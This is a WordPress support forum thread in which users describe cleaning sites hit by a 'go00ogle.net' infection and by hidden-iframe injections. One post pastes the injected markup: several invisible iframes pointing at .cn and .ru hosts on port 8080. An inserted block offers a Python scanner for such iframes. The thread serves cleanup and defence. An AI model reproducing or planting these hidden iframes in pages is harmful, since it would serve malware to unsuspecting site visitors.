WordPress.org

Forums

[resolved] Removing a go00ogle.net infection (21 posts)

  1. ambanmba
    Member
    Posted 5 years ago #

    I just spent the afternoon fixing a friend's site. Turns out this little bugger is spreading around to others as well, but as yet I haven't seen anything on Google or even here about it.

    I put together a tutorial to remove go00ogle.net if you are hit by it.

    http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html

    Sorry for the "blogspam" but this is so far the only tutorial that I know of to get rid of this.

    ambanmba

  2. Samuel B
    moderator
    Posted 5 years ago #

    great tutorial!
    this info should help others with other infections

  3. nazcar
    Member
    Posted 5 years ago #

    Great one. I am encountering the same problem but a different type (install iframe - .ru domain site with port 8080)
    with my WordPress blogs.
    They are modifying my WordPress index.php, default-filters.php and theme's/index.php, and a framer virus was detected by avg8, which resulted in a PHP error message.

    My Quick solution:
    re-upload:
    index.php, wp-includes/default-filters.php and your theme template/index.php

  4. Vertexmarketing
    Member
    Posted 5 years ago #

    Hi,
    after reading your post I am wondering if my index.php page has something like that too:
    <iframe src="http://globalmixgroup.cn:8080/ts/in.cgi?pepsi65" width=125 height=125 style="visibility:
    <iframe src="http://bigtopstudios.cn:8080/index.php" width=194 height=193 style="visibility:
    <iframe src="http://beachhousename.cn:8080/index.php" width=189 height=160 style="visibility
    <iframe src="http://namemartfilmlife.cn:8080/index.php" width=135 height=159 style="visibilit
    <iframe src="http://shopmovielife.cn:8080/index.php" width=113 height=136 style="visibili
    <iframe src="http://coolnamemart.cn:8080/index.php" width=113 height=118 style="visibil
    <iframe src="http://b6t.ru:8080/index.php" width=151 height=154 style="visibility: hidden"></iframe>
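
The injected tags in the post above are plain markup, so a file scan can flag them. The following is an added example, not code from any poster in this thread: it looks in files named index*, main* and default* (the names reported in this thread) for iframes that load a foreign host and are either hidden or served from a port other than 80/443. The function names and the sample hostnames are constructed for illustration, and the scan does not detect iframes written at runtime by an obfuscated script.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

# File-name patterns named in the thread as being modified.
TARGET_GLOBS = ("index*", "main*", "default*")
IFRAME_RE = re.compile(r"<iframe\b[^>]*", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

# Constructed sample: one injected hidden iframe and one ordinary embed.
SAMPLE = ('<iframe src="http://injected.example:8080/index.php" style="visibility: hidden"></iframe>\n'
          '<iframe src="https://video.example/embed/1" width="560"></iframe>\n')

def suspicious_iframes(text, own_hosts=()):
    """List (host, port, reasons) for iframes that load a foreign host and
    are hidden by CSS or use a port other than 80/443."""
    findings = []
    for tag in IFRAME_RE.findall(text):
        m = SRC_RE.search(tag)
        if not m:
            continue
        try:
            url = urlsplit(m.group(1))
            host, port = (url.hostname or "").lower(), url.port
        except ValueError:  # malformed URL or port
            continue
        if not host or host in own_hosts:
            continue
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden")
        if port not in (None, 80, 443):
            reasons.append("odd-port")
        if reasons:
            findings.append((host, port, "+".join(reasons)))
    return findings

def scan_tree(root, own_hosts=()):
    """Scan files matching TARGET_GLOBS under root; return {path: findings}."""
    report = {}
    for pattern in TARGET_GLOBS:
        for path in Path(root).rglob(pattern):
            if path.is_file():
                hits = suspicious_iframes(path.read_text(errors="replace"), own_hosts)
                if hits:
                    report[str(path.relative_to(root))] = hits
    return report
```

Run `scan_tree()` against a downloaded copy of the site and pass the site's own hostnames in `own_hosts` so legitimate same-site frames are ignored.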

  5. ambanmba
    Member
    Posted 5 years ago #

    @vertexmarketing,

    It's definitely not right for you to have all those iframes in there.

    The way these scripts work, however, the problem is potentially not in the index.php file, but rather inserted by a script. I would go through the instructions on my site to use AdBlock Plus to see exactly what scripts are running on your site.

    Unfortunately the malicious scripts can easily be obfuscated so that doing a search (e.g. for "globalmixgroup.cn") won't reveal anything. Instead, what you should do is use AdBlock Plus to selectively disable the scripts until you find the one that is injecting the iframes.

    Once you've narrowed down the script, you can either remove the bad code (you kinda need to know what you're looking for) or just copy a "good" version of the offending script back to your site.

    ambanmba

  6. mfshearer72
    Member
    Posted 5 years ago #

    You rock for putting this together. I just followed your instructions and cleaned up a site that this happened to.

    Much appreciated!

  7. qbano
    Member
    Posted 5 years ago #

    Good job! Thanks. This is why I love WordPress...

  8. azmitaufik
    Member
    Posted 5 years ago #

    I'm facing the same problem as nazcar. Even though I've upgraded my WordPress version to 2.8.2 and have replaced all the infected index.php files more than 5 times in the past 2 weeks, the problem keeps repeating.

    It has been more than 2 weeks, and yesterday my site was once again attacked. I haven't replaced the infected PHP files yet. You can see that my site is currently getting the warning and parsing error from the injected PHP files.

    How did the injection take place in version 2.8.2? Any solution?

    My site is azmitaufik.com

    Thanks.

  9. ambanmba
    Member
    Posted 5 years ago #

    @azmitaufik

    I would try changing all your passwords (WordPress, Hosting admin panel, myPHP, FTP, etc.). People could be getting in behind WordPress if they know the password to the back-end of your site.

    ambanmba

  10. nazcar
    Member
    Posted 5 years ago #

    @azmitaufik
    Your computer is infected with malware. It's malware that steals FTP passwords and injects code into your files. I suggest you try to scan your system with http://www.malwarebytes.org/

    Then change your FTP password.

    The system registry is also infected by malware; I suggest you also do a registry scan.

    For now, I am using my web host provider's online FTP.

  11. t3ch33
    Member
    Posted 5 years ago #

    Hi. Can someone tell me what version this is affecting?

    Thanks.

  12. tlongren
    Member
    Posted 5 years ago #

    @t3ch33, it doesn't affect a specific version of WordPress. I've found that various plugins are vulnerable.

  13. nazcar
    Member
    Posted 5 years ago #

    @t3ch33 It affects all the files with index*, main*, default* in your website.

  14. tommix
    Member
    Posted 5 years ago #

    How do they infect the blog? By FTP or holes in WordPress PHP files?

    'Cause my passwords are all a minimum of 12 chars with chars like '\*&*^% and so on... so how do they modify your files? By cracking your passwords or what?

    And if not by FTP, all you have to do is chmod your PHP files to 444 and it will fix it :D and disable the chmod function in php.ini so they can't execute it in PHP.

  15. Matt McInvale
    Member
    Posted 5 years ago #

    These attacks are carried out by someone with your FTP credentials. Change all your passwords & reinstall Windows. The infections are *very* difficult to remove and it's likely you'll be unable to remove everything they've installed on your system.

  16. martinsclass
    Member
    Posted 4 years ago #

    I don't know if this is it, but I've been toying with various plugins to try to get avatars working for my students who will be users soon, and after installing the plugin *user photo* I started having this error message pop up - first on my user profile screen after attempting to upload a pic, and then all over my site, on various pages. Not all of them, but on user profiles and on one not all of my pages.

    Now I have deleted that plugin, and the error remains on my "policies" page.

    I'm at a loss as to what to do, that permission thing is so tacky!

  17. martinsclass
    Member
    Posted 4 years ago #

    I think I resolved the issue; it had to do with an image that wasn't uploading right.

  18. UseShots
    Member
    Posted 4 years ago #

    @ambanmba: Thanks for the tutorial!

    @tommix: Malware simply steals your FTP credentials from your FTP program configuration files. Everything you save in your FTP programs is easily accessible to malware.

    For example, FileZilla stores your passwords in plain text and doesn't protect them "by design". Other FTP clients are no better. So don't save your passwords in FTP programs if you don't want to see your sites hacked.

  19. webmistressofthedark
    Member
    Posted 4 years ago #

    I have a different problem. In the past, older versions were hacked through the themes and you could simply remove the files and replace them, upgrade and change your password.

    I noticed on one blog which I have updated, using v2.5.1, that the person got into the database (his handle was found in both users and usermeta files) and it made it so he replaced his name where my 'admin' name appeared. It was just this morning on the last two posts, which I lost when I deleted his user info from the DB.

    Finally I got rid of where it says Admins (2)... I knew he'd been into the DB because I deleted ALL the users except the admin, and it still said that before I went into the PHP My Admin.

    I do not know a heck of a lot how to fix the DBs except after I did that I repaired and then backed up and then upgraded.

    Here is my question... I have changed the password to the admin for the blog but now I am not sure how to change the DB password.

    Is this done in the config file or in the cPanel or php my admin somewhere?
    If so I can only find a way to delete the db NAME and start over with a new NAME for it but I fear if I do that I might lose content.

    TIA

  20. webmistressofthedark
    Member
    Posted 4 years ago #

    This is version specific and they get in via the theme files.

    Look in your header, footer and index files.

    Mine was hacked in the DB alone and I still can't figure out how to change the pw for the DB itself...

  21. digitalguru
    Member
    Posted 4 years ago #

    Changing the database password can be done through PHP MyAdmin.

    Here are directions to make the changes. http://www.devlounge.net/publishing/reset-a-wordpress-password-from-phpmyadmin

Topic Closed

This topic has been closed to new replies.
